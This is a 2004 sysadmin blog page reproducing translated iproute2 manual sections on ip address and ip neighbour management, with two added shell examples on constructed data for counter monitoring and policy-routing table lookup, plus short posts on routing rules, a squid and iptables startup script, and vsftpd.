    kuznet@alisa:~ $ ip -s -s link ls eth0
    3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
        link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
        RX: bytes  packets  errors  dropped overrun mcast
        2449949362 2786187  0       0       0       0
        RX errors: length  crc     frame   fifo    missed
                   0       0       0       0       0
        TX: bytes  packets  errors  dropped carrier collsns
        178558497  1783946  332     0       332     35172
        TX errors: aborted fifo    window  heartbeat
                   0       0       0       332
    kuznet@alisa:~ $
These error names are purely Ethernet-centric; for other kinds of devices the fields may have different meanings.

5. ip address -- protocol address management
Abbreviations: address, addr, a
Object: the address here is a protocol (IP or IPv6) address bound to a network device. Each network device should have at least one protocol address, and a device may have several. The ip addr command displays a device's protocol addresses and their properties, adds new addresses and deletes old ones.
Commands: add, delete, flush and show (or list)

5.1. ip address add -- add a new protocol address
Abbreviations: add, a
Parameters
  dev NAME  The device to operate on.
  local ADDRESS (default)  The address of the interface. The format depends on the protocol: IPv4 addresses use dots as separators, IPv6 addresses use colons. ADDRESS may be followed by a slash and a decimal prefix length.
  peer ADDRESS  The address of the remote endpoint of a point-to-point interface. ADDRESS may also be followed by a slash and a decimal prefix length.
  broadcast ADDRESS  The broadcast address of the interface. For convenience, + and - (note 1) may be used instead of the broadcast address, e.g.:
      ip addr add local 192.168.1.1/24 brd + dev eth0
      ip addr add local 192.168.1.1/28 brd - dev eth0
  label NAME  Tag each address with a string. For compatibility with Linux 2.0 network aliases, the string must start with the device name followed by a colon, e.g.:
      #ip addr add local 192.168.4.1/28 brd + label eth0:1 dev eth0
  scope SCOPE_VALUE (note 2)  The scope of the address, which the kernel uses when choosing source addresses for packets. The valid scopes are listed in /etc/iproute2/rt_scopes; the system predefines the following:
      global  The address is valid globally.
      link  The address is link local, i.e. valid only on this device.
      site  (IPv6 only) The address is valid inside the site.
      host  The address is valid only inside this host.
  * Note 1: with -, ip addr ls shows the network address; with +, ip addr ls shows the broadcast address.
  * Note 2: scope is explained in more detail in Appendix A.
Examples
Add a loopback address on the loopback device:
    #ip addr add 127.0.0.1/8 dev lo brd + scope host
Add the address 10.0.0.1 with prefix length 24 (netmask 255.255.255.0), the standard broadcast address and the label eth0:Alias to the Ethernet interface eth0:
    #ip addr add 10.0.0.1/24 brd + dev eth0 label eth0:Alias

5.2. ip address delete -- delete a protocol address
Abbreviations: delete, del, d
Parameters
The parameters are the same as for ip addr add. Only the device name is mandatory; everything else is optional. If nothing but the device name is given, ip deletes the first address of that device.
Examples
Delete a loopback address from the loopback device (better not to try this):
    #ip addr del 127.0.0.1/8 dev lo
The following shell snippet removes all IPv4 addresses from a device:
    while ip -f inet addr del dev eth0; do
        : nothing
    done
Alternatively, use ip addr flush to remove the addresses.

5.3. ip address show -- display protocol addresses
Abbreviations: show, list, lst, sh, ls, l
Parameters
  dev NAME (default)  The name of the device.
  scope SCOPE_VAL  List only addresses with this scope.
  to PREFIX  List only addresses matching PREFIX, e.g. ip addr ls to 192.168.1.1
  label PATTERN  List only addresses whose label matches PATTERN, a shell-style pattern.
  dynamic and permanent  (IPv6 only) With dynamic, ip lists only dynamic addresses; with permanent, only permanent ones.
  tentative  (IPv6 only) List only addresses that have not passed duplicate address detection [ref 2].
  deprecated  (IPv6 only) List only deprecated [ref 2] addresses.
  primary and secondary  List only primary or only secondary addresses.
Output format
    kuznet@alisa:~ $ ip addr ls eth0
    3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
        link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
        inet 193.233.7.90/24 brd 193.233.7.255 scope global eth0
        inet6 3ffe:2400:0:1:2a0:ccff:fe66:1878/64 scope global dynamic
           valid_lft forever preferred_lft 604746sec
        inet6 fe80::2a0:ccff:fe66:1878/10 scope link
    kuznet@alisa:~ $
The first two lines are the same as in the output of ip link ls. Then come the IP and IPv6 addresses, the broadcast address and the other address attributes: scope, flags and label. Address flags are set by the kernel and cannot be changed by the administrator. The kernel currently defines the following flags:
  secondary  The kernel does not use this address when choosing the default source address for outgoing packets. If a device already has an address and another address in the same subnet is added, the second one becomes a secondary address. For example, if eth0 already has 192.168.1.108/24 and 192.168.1.3/24 is added, the kernel marks 192.168.1.3/24 as secondary.
  dynamic  The address was created by stateless autoconfiguration [ref 2]. If the address is still valid, the output also contains two lifetimes: when preferred_lft expires, the address becomes deprecated; when valid_lft expires, the address becomes invalid.
  deprecated  The address is deprecated, i.e. it is still valid but cannot be used to establish new connections.
  tentative  The address cannot be used because duplicate address detection [ref 2] has not finished yet or has failed.

5.4. ip address flush -- flush protocol addresses
Abbreviations: flush, f
Description
This command flushes protocol addresses selected by some criteria.
Parameters
The parameters are the same as for ip address show. The only difference is that the command does nothing if no arguments are given.
Warning
This command (and all the flush commands discussed later) is very dangerous. If you make a mistake there is no way back: the selected addresses are gone.
statistics option
With the -statistics option, ip addr flush prints more information: the number of deleted addresses and the number of rounds made to flush the address list. If the -s option is given twice, ip addr flush also dumps all deleted addresses in the format described in the previous section.
Examples
Delete all addresses belonging to the private network 10.0.0.0/8:
    netadm@amber:~ # ip -s -s a f to 10/8
    2: dummy    inet 10.7.7.7/16 brd 10.7.255.255 scope global dummy
    3: eth0    inet 10.10.7.7/16 brd 10.10.255.255 scope global eth0
    4: eth1    inet 10.8.7.7/16 brd 10.8.255.255 scope global eth1
    *** Round 1, deleting 3 addresses ***
    *** Flush is complete after 1 round ***
    netadm@amber:~ #
Remove the IP addresses of all Ethernet cards:
    netadm@amber:~ # ip -4 addr flush label "eth0"
The last example concerns IPv6 addresses. After enabling forwarding or disabling autoconfiguration, you need to remove the host addresses obtained through stateless address autoconfiguration:
    netadm@amber:~ # ip -6 addr flush dynamic

6. ip neighbour -- neighbour/ARP table management
Abbreviations: neighbour, neighbor, neigh, n
Object: neighbour objects bind protocol addresses to link-layer addresses on the same link. In the kernel these entries are organised into tables; the IPv4 neighbour table is also known as the ARP table. The ip neighbour command supports displaying, adding and deleting entries and their attributes.
Commands: add, change, replace, delete, flush, show (or list)
Appendix B describes in detail how to manage proxy ARP/NDISC with ip.

6.1. ip neighbour add -- add a new neighbour entry; ip neighbour change -- change an existing entry; ip neighbour replace -- replace an existing entry
Abbreviations: add, a; change, chg; replace, repl
Description: these three commands create new neighbour table entries or update existing ones.
Parameters
  to ADDRESS (default)  The protocol address of the neighbour, IPv4 or IPv6.
  dev NAME  The interface the neighbour is attached to.
  lladdr LLADDRESS  The link-layer address of the neighbour. LLADDRESS may be null.
  nud NUD_STATE  The state of the neighbour entry. nud is an abbreviation of Neighbour Unreachability Detection. Possible states: permanent -- the entry is valid forever and can only be removed by the administrator; noarp -- the entry is valid, and no attempt is made to validate it; it is removed when its lifetime expires; reachable -- the entry is valid until the reachability timeout expires; stale -- the entry is valid but suspicious. If the entry is valid, ip neigh does not change the neighbour state and does not modify its address.
Examples
Add a permanent ARP entry for the address 10.0.0.3 on device eth0:
    ip neigh add 10.0.0.3 lladdr 0:0:0:0:0:1 dev eth0 nud perm
Change its state to reachable:
    ip neigh chg 10.0.0.3 dev eth0 nud reachable

6.2. ip neighbour delete -- delete a neighbour entry
Abbreviations: delete, del, d
Description: this command deletes a neighbour entry.
Parameters
The parameters are the same as for ip neigh add, except that lladdr and nud are ignored.
Example
Delete the ARP entry for 10.0.0.3 on device eth0:
    ip neigh del 10.0.0.3 dev eth0
A deleted entry does not disappear immediately; it is removed at the system's next garbage collection. An entry that is currently in use cannot be deleted.
Warning
Attempts to delete or manually change a noarp entry created by the kernel may result in unpredictable behaviour.

6.3. ip neighbour show -- display neighbour information
Abbreviations: show, list, sh, ls
Description: this command displays neighbour information.
Parameters
  to ADDRESS (default)  The address to display.
  dev NAME  Show only the neighbours on device NAME.
  unused  Show only neighbours that are not currently in use.
  nud NUD_STATE  List only neighbour entries in state NUD_STATE. The values of NUD_STATE are described below; nud all means all states. This option may be given several times. If it is absent, ip lists all entries except those in the none and noarp states.
Output format
    kuznet@alisa:~ $ ip neigh ls
    :: dev lo lladdr 00:00:00:00:00:00 nud noarp
    fe80::200:cff:fe76:3f85 dev eth0 lladdr 00:00:0c:76:3f:86 router nud stale
    0.0.0.0 dev lo lladdr 00:00:00:00:00:00 nud noarp
    193.233.7.254 dev eth0 lladdr 00:00:0c:76:3f:85 nud reachable
    193.233.7.85 dev eth0 lladdr 00:e0:1e:63:39:00 nud stale
    kuznet@alisa:~ $
The first part of each line is the protocol address of the neighbour, the second part is the device name, and the rest describes the neighbour entry. lladdr is the link-layer address of the neighbour. nud is the state of the connection that the entry represents. The complete list of states, with short descriptions:
  none  The state of the neighbour is void.
  incomplete  The neighbour is being resolved.
  reachable  The neighbour is valid and reachable.
  stale  The neighbour is valid but may be unreachable, so the kernel will check it at the first transmission.
  delay  A packet has been sent to the stale neighbour and the kernel is waiting for confirmation.
  probe  The delay timer expired without confirmation; the kernel starts probing the neighbour with ARP/NDISC messages.
  failed  Resolution has failed.
  noarp  The neighbour is valid; no attempt is made to check it.
  permanent  A noarp entry that only the administrator may remove from the neighbour table.
All of these states except none, failed and incomplete.
IPv6 neighbours may carry a router flag, which means the node is an IPv6 router.
-statistics
The -statistics option displays a lot of useful information, e.g.:
    kuznet@alisa:~ $ ip -s n ls 193.233.7.254
    193.233.7.254 dev eth0 lladdr 00:00:0c:76:3f:85 ref 5 used 12/13/20 nud reachable
    kuznet@alisa:~ $
The output now contains ref and three times separated by slashes. ref is the number of users of this entry; the three times are the time since the entry was last used, last confirmed and last updated. So the times above mean: the entry was used 12 seconds ago, confirmed 13 seconds ago and updated 20 seconds ago.

6.4. ip neighbour flush -- flush neighbour entries
Abbreviations: flush, f
Description: this command flushes neighbour table entries selected by some criteria.
Parameters
The parameters are the same as for ip neigh sh. The differences are that the command does nothing if no arguments are given, and that by default entries in the permanent and noarp states are not deleted.
-statistics
With the -statistics option, the output is more verbose: it shows the number of deleted entries and the number of rounds made to flush the table. With two -s options, the output also includes the deleted entries themselves.
Example
    netadm@alisa:~ # ip -s -s n f 193.233.7.254
    193.233.7.254 dev eth0 lladdr 00:00:0c:76:3f:85 ref 5 used 12/13/20 nud reachable
    *** Round 1, deleting 1 entries ***
    *** Flush is complete after 1 round ***
    netadm@alisa:~ #
Source: BBS 水木清华站 smth.edu.cn
Posted by windtear at 1:38 AM
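An added example (not part of the forwarded manual) of the user-space monitoring that section 4.2 calls for: two constructed ip -s link ls eth0 snapshots, in the layout shown there, are parsed by column name, and the growth of each counter is computed with single-wrap handling for a 32-bit byte counter. The counter values are made up so that RX bytes wraps between the snapshots.

```shell
#!/bin/sh
# Two constructed snapshots of `ip -s link ls eth0` (not real captures), taken
# some interval apart. RX bytes is close to 2^32 in the first and wraps before
# the second; RX dropped and TX errors also grow.
SNAP1='3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
    link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
    RX: bytes  packets  errors  dropped overrun mcast
    4294960000 2786187  0       0       0       0
    TX: bytes  packets  errors  dropped carrier collsns
    178558497  1783946  332     0       332     35172'
SNAP2='3: eth0: <BROADCAST,MULTICAST,UP> mtu 1500 qdisc cbq qlen 100
    link/ether 00:a0:cc:66:18:78 brd ff:ff:ff:ff:ff:ff
    RX: bytes  packets  errors  dropped overrun mcast
    12000      2790000  0       40      0       0
    TX: bytes  packets  errors  dropped carrier collsns
    178600000  1784500  340     0       340     35200'

# Extract one counter from a snapshot read on stdin: $1 is RX or TX, $2 is the
# column name. The "RX:"/"TX:" line names the columns; the values follow on the
# next line, one field to the left because the header starts with the label.
counter() {
    awk -v dir="$1:" -v col="$2" '
        $1 == dir {
            for (i = 2; i <= NF; i++) if ($i == col) want = i - 1
            getline
            print $want
            exit
        }'
}

# Growth between two readings of a 32-bit counter, allowing for at most one
# wrap-around between samples (the case the manual warns about for bytes).
delta32() {
    if [ "$2" -ge "$1" ]; then
        echo $(( $2 - $1 ))
    else
        echo $(( $2 - $1 + 4294967296 ))
    fi
}

# Per-counter growth between the two snapshots, one line per counter.
# Growing errors/dropped counters are the lines an operator would alert on.
report() {
    for dir in RX TX; do
        for col in bytes packets errors dropped; do
            before=$(printf '%s\n' "$SNAP1" | counter "$dir" "$col")
            after=$(printf '%s\n' "$SNAP2"  | counter "$dir" "$col")
            printf '%s %s +%s\n' "$dir" "$col" "$(delta32 "$before" "$after")"
        done
    done
}

report
```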
1. ip rule - iproute2 - the most powerful tool
% rpm -qil iproute
Name        : iproute                      Relocations: (not relocateable)
Version     : 2.4.7                             Vendor: Red Hat, Inc.
Release     : 7.73.1                        Build Date: Tue 04 Nov 2003 12:09:59 AM CST
Install date: Tue 23 Dec 2003 01:43:50 AM CST      Build Host: stripples.devel.redhat.com
Group       : Applications/System           Source RPM: iproute-2.4.7-7.73.1.src.rpm
Size        : 940710                           License: GNU GPL
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
Summary     : Advanced IP routing and network device configuration tools.
Description :
The iproute package contains networking utilities (ip and rtmon, for
example) which are designed to use the advanced networking
capabilities of the Linux 2.2.x kernel.
/etc/iproute2
/etc/iproute2/rt_dsfield
/etc/iproute2/rt_protos
/etc/iproute2/rt_realms
/etc/iproute2/rt_scopes
/etc/iproute2/rt_tables
/sbin/ifcfg
/sbin/ip
/sbin/rtmon
/sbin/tc
/usr/sbin/rtacct
/usr/share/doc/iproute-2.4.7
/usr/share/doc/iproute-2.4.7/README.decnet
/usr/share/doc/iproute-2.4.7/README.iproute2+tc
/usr/share/doc/iproute-2.4.7/RELNOTES
/usr/share/doc/iproute-2.4.7/api-ip6-flowlabels.ps
/usr/share/doc/iproute-2.4.7/examples
/usr/share/doc/iproute-2.4.7/examples/SYN-DoS.rate.limit
/usr/share/doc/iproute-2.4.7/examples/cbqinit.eth1
/usr/share/doc/iproute-2.4.7/examples/dhcp-client-script
/usr/share/doc/iproute-2.4.7/examples/diffserv
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge1
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge2
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge31-ca-u32
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge31-cb-chains
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-ca-u32
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-cb-chains
/usr/share/doc/iproute-2.4.7/examples/diffserv/Edge32-cb-u32
/usr/share/doc/iproute-2.4.7/examples/diffserv/README
/usr/share/doc/iproute-2.4.7/examples/diffserv/afcbq
/usr/share/doc/iproute-2.4.7/examples/diffserv/ef-prio
/usr/share/doc/iproute-2.4.7/examples/diffserv/efcbq
/usr/share/doc/iproute-2.4.7/examples/diffserv/regression-testing
/usr/share/doc/iproute-2.4.7/ip-cref.ps
/usr/share/doc/iproute-2.4.7/ip-tunnels.ps
/usr/share/man/man8/ip.8.gz

-----> a sample
% cat /etc/iproute2/rt_tables
#
# reserved values
#
#255 local
#254 main
#253 default
#0 unspec
#
# local
#
#1 inr.ruhep
210 cenpok
220 lab

% tail ....sh
# adv route
$IP route add default via a.b.c.d src h.i.j.k dev cenpok table cenpok
$IP rule add from h.i.j.k table cenpok
$IP route add default via a.b.c.e src h.i.j.l dev lab table lab
$IP rule add from h.i.j.l table lab
$IP route flush cache

-----> view the fact
% ip rule ls
0:      from all lookup local
32764:  from h.i.j.l lookup lab
32765:  from h.i.j.k lookup cenpok
32766:  from all lookup main
32767:  from all lookup 253
% ip route ls table cenpok
default via a.b.c.d dev cenpok  src h.i.j.k
% ip route ls table lab
default via a.b.c.e dev lab  src h.i.j.l
Posted by windtear at 1:35 AM
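The rule listing above, reworked as an added example (not the author's script): given a constructed rt_tables with the same commented-out reserved entries and the stand-in addresses 192.0.2.10 and 192.0.2.11 for h.i.j.k and h.i.j.l, lookup_order prints, in priority order, the tables consulted for packets from a given source, resolving each table name to its number. local and main are assumed to be built into ip (they print by name above although the file comments them out), while 253 stays a bare number because its default entry is commented out.

```shell
#!/bin/sh
# Constructed /etc/iproute2/rt_tables mirroring the sample above: the reserved
# names are commented out, so only cenpok and lab can be resolved from the file.
RT_TABLES='#
# reserved values
#
#255 local
#254 main
#253 default
#0 unspec
#
# local
#
#1 inr.ruhep
210 cenpok
220 lab'

# Constructed `ip rule ls` output with concrete stand-in source addresses
# (192.0.2.10 for h.i.j.k, 192.0.2.11 for h.i.j.l). Already in priority order.
RULES='0:      from all lookup local
32764:  from 192.0.2.11 lookup lab
32765:  from 192.0.2.10 lookup cenpok
32766:  from all lookup main
32767:  from all lookup 253'

# Resolve a table name to its number: first rt_tables, then the two names ip
# knows without the file (local=255, main=254). Anything else is returned as is,
# which is how a bare number such as 253 passes through.
table_id() {
    id=$(printf '%s\n' "$RT_TABLES" | awk -v name="$1" '
        /^[ \t]*#/ || NF < 2 { next }      # skip comments and blank lines
        $2 == name { print $1; exit }')
    case "$1" in
        local) echo "${id:-255}" ;;
        main)  echo "${id:-254}" ;;
        *)     echo "${id:-$1}" ;;
    esac
}

# Print "table number" lines, in priority order, for every rule that applies to
# packets from source $1. Rules match on "from all" or an exact "from ADDR";
# prefix selectors such as 10/8 are not handled here.
lookup_order() {
    printf '%s\n' "$RULES" | awk -v src="$1" '
        $2 == "from" && ($3 == "all" || $3 == src) && $4 == "lookup" { print $5 }' |
    while IFS= read -r tbl; do
        printf '%s %s\n' "$tbl" "$(table_id "$tbl")"
    done
}

echo "source 192.0.2.11:"; lookup_order 192.0.2.11
echo "source 192.0.2.10:"; lookup_order 192.0.2.10
echo "source 203.0.113.7:"; lookup_order 203.0.113.7
```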
April 3, 2004
squid maintain sample . chaotic sample:(
/etc/rc.d/rc3.d
S25squid -> ../init.d/squid

/etc/rc.d/rc.local
IPTABLES=/sbin/iptables
$IPTABLES -N squid
$IPTABLES -t filter -A INPUT -j squid -p tcp --dport $PORT
# auto deny
tail -f /opt/old_access/access.log | /opt/old_access/autodeny.pl &
sh /etc/rc.d/_squid_deny.sh &
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "1" > /proc/sys/net/ipv4/tcp_syncookies
MODPROBE=/sbin/modprobe
$MODPROBE ip_nat_ftp
$MODPROBE ip_nat_irc
$MODPROBE ip_conntrack
$MODPROBE ip_conntrack_ftp
$MODPROBE ip_conntrack_irc
$MODPROBE iptable_filter
$MODPROBE iptable_nat
$MODPROBE ip_tables
$MODPROBE ipt_MASQUERADE
sh /etc/rc.d/_nat_use.sh
sh /etc/rc.d/_squid.sh
$IPTABLES -t nat -A PREROUTING -s 192.168.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports $PORT
Posted by windtear at 10:03 PM
April 2, 2004
vsftpd - probably the most secure and fastest FTP server for UNIX-like systems
http://vsftpd.beasts.org/

vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast. It is stable. Don't take my word for it, though. Below, we will see evidence supporting all three assertions. We will also see a list of a few
Posted by windtear at 10:12 PM